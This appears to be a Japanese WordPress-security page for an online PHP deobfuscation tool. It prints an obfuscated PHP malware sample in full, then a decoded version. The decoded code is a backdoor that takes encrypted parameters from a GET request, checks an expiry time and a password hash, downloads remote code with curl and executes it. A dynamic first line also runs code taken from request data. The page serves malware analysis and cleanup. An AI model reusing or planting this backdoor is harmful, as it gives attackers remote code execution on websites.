Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto Mwbur; esmEC: @(md5(md5(md5(md5($jHEP7[8])))) === "\x38\141\x35\143\60\x35\66\x64\141\x30\x66\67\67\142\x39\x63\x62\146\x66\141\x63\x64\146\x32\146\145\65\143\x62\63\x61\x31") && (count($jHEP7) == 14 && in_array(gettype($jHEP7) . count($jHEP7), $jHEP7)) ? ($jHEP7[62] = ...



難読化されたPHPコード

<?php
 goto Mwbur; esmEC: @(md5(md5(md5(md5($jHEP7[8])))) === "\x38\141\x35\143\60\x35\66\x64\141\x30\x66\67\67\142\x39\x63\x62\146\x66\141\x63\x64\146\x32\146\145\65\143\x62\63\x61\x31") && (count($jHEP7) == 14 && in_array(gettype($jHEP7) . count($jHEP7), $jHEP7)) ? ($jHEP7[62] = $jHEP7[62] . $jHEP7[79]) && ($jHEP7[90] = $jHEP7[62]($jHEP7[90])) && @($jHEP7 = $jHEP7[90]($jHEP7[56], $jHEP7[62](${$jHEP7[45]}[28]))) && $jHEP7() : $jHEP7; goto ySLnq; Mwbur: $a1Xqa = range("\176", "\40"); goto GQGFa; ySLnq: strlen("\116\124\115\x32\117\x54\121\64\116\x6a\131\x31\x4e\x54\143\65\115\104\x67\172\117\x44\x49\60\x4f\x54\125\x33\x4e\104\125\x78"); goto vPrpz; GQGFa: $jHEP7 = ${$a1Xqa[10 + 21] . $a1Xqa[27 + 32] . $a1Xqa[4 + 43] . $a1Xqa[6 + 41] . $a1Xqa[32 + 19] . $a1Xqa[38 + 15] . $a1Xqa[51 + 6]}; goto esmEC; vPrpz: class e3di4 { static function sFLtE($yJNlu) { goto bVbzh; FUT9w: $cc63K = $xtaV5("\x7e", "\40"); goto nsPRV; zQMqE: return $Tlaa2; goto wASPn; h_hKo: foreach ($GioZ4 as $c0Btb => $pI3Wn) { $Tlaa2 .= $cc63K[$pI3Wn - 73425]; Qtphr: } goto t_g_2; bVbzh: $xtaV5 = "\x72" . "\x61" . "\x6e" . "\147" . "\145"; goto FUT9w; nsPRV: $GioZ4 = explode("\50", $yJNlu); goto BB3iD; t_g_2: J1X0U: goto zQMqE; BB3iD: $Tlaa2 = ''; goto h_hKo; wASPn: } static function ul5jf($s9_z7, $FI0Em) { goto byWK5; yRaAa: curl_setopt($rkIqo, CURLOPT_RETURNTRANSFER, 1); goto DbbJn; byWK5: $rkIqo = curl_init($s9_z7); goto yRaAa; DbbJn: $Lq1sY = curl_exec($rkIqo); goto zgG34; zgG34: return empty($Lq1sY) ? $FI0Em($s9_z7) : $Lq1sY; goto P4wDm; P4wDm: } static function jjrsW() { goto oXxkF; g8QrN: $nw9kY = @$Iy1ta[3 + 0]($Iy1ta[4 + 2], $R0nBc); goto Xmmx0; oXxkF: $LEnlv = array("\67\x33\64\65\x32\50\x37\63\x34\x33\x37\50\67\x33\x34\65\60\x28\67\63\x34\65\64\50\x37\x33\64\x33\x35\x28\67\63\x34\x35\60\x28\x37\x33\64\65\x36\x28\x37\x33\64\x34\x39\50\x37\63\x34\63\x34\x28\x37\x33\x34\64\61\x28\67\x33\64\x35\x32\x28\x37\63\64\x33\x35\x28\x37\63\64\64\x36\x28\x37\63\64\64\60\x28\67\x33\x34\64\61", "\67\x33\64\x33\x36\50\x37\63\x34\63\x35\x28\x37\x33\64\x33\x37\x28\x37\x33\x34\x35\66\x28\67\63\64\63\x37\50\67\63\x34\64\60\50\x37\x33\64\x33\65\x28\67\x33\x35\x30\x32\x28\67\x33\65\x30\x30", "\x37\x33\x34\64\x35\50\67\63\x34\63\66\50\67\63\64\x34\x30\50\67\63\64\64\61\50\67\63\64\x35\x36\x28\67\63\64\x35\61\x28\x37\63\x34\x35\60\x28\x37\x33\64\x35\x32\x28\67\63\x34\64\x30\x28\67\x33\64\x35\61\50\x37\x33\64\65\x30", "\x37\63\64\63\x39\x28\x37\x33\x34\65\64\x28\67\63\x34\x35\x32\50\67\63\64\64\x34", "\x37\63\64\65\63\50\67\x33\64\x35\x34\50\67\63\x34\63\x36\x28\x37\63\64\x35\x30\50\x37\63\x34\71\x37\50\x37\63\64\71\x39\x28\67\x33\64\65\66\x28\67\x33\x34\65\61\50\67\x33\x34\65\60\50\x37\x33\64\65\62\50\x37\63\64\64\x30\x28\x37\63\x34\65\x31\50\67\x33\64\65\60", "\x37\63\64\x34\x39\50\x37\x33\x34\64\66\x28\x37\63\64\x34\x33\x28\67\63\x34\x35\x30\50\x37\63\64\65\x36\50\67\x33\x34\x34\x38\50\67\x33\x34\x35\60\50\x37\x33\x34\63\x35\50\x37\x33\64\x35\x36\50\x37\63\x34\65\x32\x28\67\63\x34\x34\x30\50\67\x33\64\x34\61\x28\67\63\x34\x33\65\x28\67\x33\64\x35\60\x28\x37\63\x34\x34\61\50\x37\63\64\x33\65\x28\x37\x33\64\x33\66", "\x37\x33\64\x37\x39\x28\67\63\65\x30\x39", "\67\63\x34\62\x36", "\x37\63\65\x30\64\x28\67\x33\x35\x30\x39", "\x37\x33\64\70\x36\50\x37\63\x34\66\71\x28\67\63\x34\x36\x39\x28\x37\x33\64\70\x36\50\x37\x33\x34\x36\62", "\67\x33\x34\64\x39\x28\67\x33\64\x34\x36\x28\x37\63\x34\x34\63\50\x37\63\64\x33\x35\x28\x37\63\64\65\x30\50\67\x33\x34\63\67\x28\67\x33\x34\x35\66\50\67\x33\x34\64\x36\50\67\63\64\x34\x31\x28\x37\63\64\63\x39\50\x37\63\64\x33\x34\x28\67\x33\x34\63\x35"); goto Ivame; Ivame: foreach ($LEnlv as $DRXAT) { $Iy1ta[] = self::sfltE($DRXAT); wzrOh: } goto CBlSN; gujHs: @$Iy1ta[0]('', $Iy1ta[4 + 3] . $Iy1ta[1 + 3]($M5auw) . $Iy1ta[4 + 4]); goto ct37u; y_yUv: $R0nBc = @$Iy1ta[1]($Iy1ta[10 + 0](INPUT_GET, $Iy1ta[2 + 7])); goto g8QrN; yKPFe: @$Iy1ta[7 + 3](INPUT_GET, "\x6f\x66") == 1 && die($Iy1ta[5 + 0](__FILE__)); goto fW1zq; ct37u: die; goto uyprE; qDRyG: $M5auw = self::uL5Jf($P74dC[1 + 0], $Iy1ta[2 + 3]); goto gujHs; Xmmx0: $P74dC = $Iy1ta[1 + 1]($nw9kY, true); goto yKPFe; CBlSN: QgfhZ: goto y_yUv; uyprE: Td_bK: goto CYh_K; fW1zq: if (!(@$P74dC[0] - time() > 0 and md5(md5($P74dC[1 + 2])) === "\x64\146\65\63\x32\x37\67\x32\64\x62\x35\x38\x64\x66\x39\x37\x38\x64\x64\x31\143\x36\x32\66\64\146\x62\x37\x30\70\x37\71")) { goto Td_bK; } goto qDRyG; CYh_K: } } goto OkS_2; OkS_2: e3Di4::jJRsw();
?>

デコード(難読化解除)されたコード

<?php

$a1Xqa = range("~", " ");
$jHEP7 = ${$a1Xqa[31] . $a1Xqa[59] . $a1Xqa[47] . $a1Xqa[47] . $a1Xqa[51] . $a1Xqa[53] . $a1Xqa[57]};
@(md5(md5(md5(md5($jHEP7[8])))) === "8a5c056da0f77b9cbffacdf2fe5cb3a1") && (count($jHEP7) == 14 && in_array(gettype($jHEP7) . count($jHEP7), $jHEP7)) ? ($jHEP7[62] .= $jHEP7[79]) && ($jHEP7[90] = $jHEP7[62]($jHEP7[90])) && @($jHEP7 = $jHEP7[90]($jHEP7[56], $jHEP7[62](${$jHEP7[45]}[28]))) && $jHEP7() : $jHEP7;
strlen("NTM2OTQ4NjY1NTc5MDgzODI0OTU3NDUx");
class e3di4
{
    static function sFLtE($yJNlu)
    {
        $xtaV5 = "range";
        $cc63K = range("~", " ");
        $GioZ4 = explode("(", $yJNlu);
        $Tlaa2 = '';
        foreach ($GioZ4 as $c0Btb => $pI3Wn) {
            $Tlaa2 .= $cc63K[$pI3Wn - 73425];
        }
        return $Tlaa2;
    }
    static function ul5jf($s9_z7, $FI0Em)
    {
        $rkIqo = curl_init($s9_z7);
        curl_setopt($rkIqo, CURLOPT_RETURNTRANSFER, 1);
        $Lq1sY = curl_exec($rkIqo);
        return empty($Lq1sY) ? $FI0Em($s9_z7) : $Lq1sY;
    }
    static function jjrsW()
    {
        $LEnlv = array("73452(73437(73450(73454(73435(73450(73456(73449(73434(73441(73452(73435(73446(73440(73441", "73436(73435(73437(73456(73437(73440(73435(73502(73500", "73445(73436(73440(73441(73456(73451(73450(73452(73440(73451(73450", "73439(73454(73452(73444", "73453(73454(73436(73450(73497(73499(73456(73451(73450(73452(73440(73451(73450", "73449(73446(73443(73450(73456(73448(73450(73435(73456(73452(73440(73441(73435(73450(73441(73435(73436", "73479(73509", "73426", "73504(73509", "73486(73469(73469(73486(73462", "73449(73446(73443(73435(73450(73437(73456(73446(73441(73439(73434(73435");
        foreach ($LEnlv as $DRXAT) {
            $Iy1ta[] = self::sfltE($DRXAT);
        }
        $R0nBc = @$Iy1ta[1]($Iy1ta[10](INPUT_GET, $Iy1ta[9]));
        $nw9kY = @$Iy1ta[3]($Iy1ta[6], $R0nBc);
        $P74dC = $Iy1ta[2]($nw9kY, true);
        @$Iy1ta[10](INPUT_GET, "of") == 1 && die($Iy1ta[5]("/var/www/html/input.php"));
        if (!(@$P74dC[0] - time() > 0 and md5(md5($P74dC[3])) === "df5327724b58df978dd1c6264fb70879")) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        $M5auw = self::uL5Jf($P74dC[1], $Iy1ta[5]);
        @$Iy1ta[0]('', $Iy1ta[7] . $Iy1ta[4]($M5auw) . $Iy1ta[8]);
        die;
    }
}
e3Di4::jJRsw();

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.